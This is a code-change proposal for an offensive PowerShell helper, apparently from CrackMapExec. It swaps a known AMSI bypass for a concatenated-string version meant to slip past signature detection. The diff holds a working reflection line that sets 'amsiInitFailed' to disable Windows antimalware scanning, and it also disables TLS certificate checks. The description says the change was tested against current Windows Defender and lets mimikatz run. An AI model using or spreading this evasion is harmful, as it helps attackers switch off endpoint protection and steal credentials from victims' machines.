### PR TITLE
updated amsi bypass

### DIFF
--- a/cme/helpers/powershell.py
+++ b/cme/helpers/powershell.py
@@ -71,7 +71,7 @@ def create_ps_command(ps_command, force_ps32=False, dont_obfs=False):
 
     amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
 try{
-[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
+[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
 }catch{}
 """
 


### PR DESCRIPTION
AMSI catches the original AMSI bypass that Graeber posted that you used. We must obfuscate it with concatenated strings. I tested this one against the latest Windows Defender and it bypasses AMSI. -M mimikatz did not work before on updated system, now it does.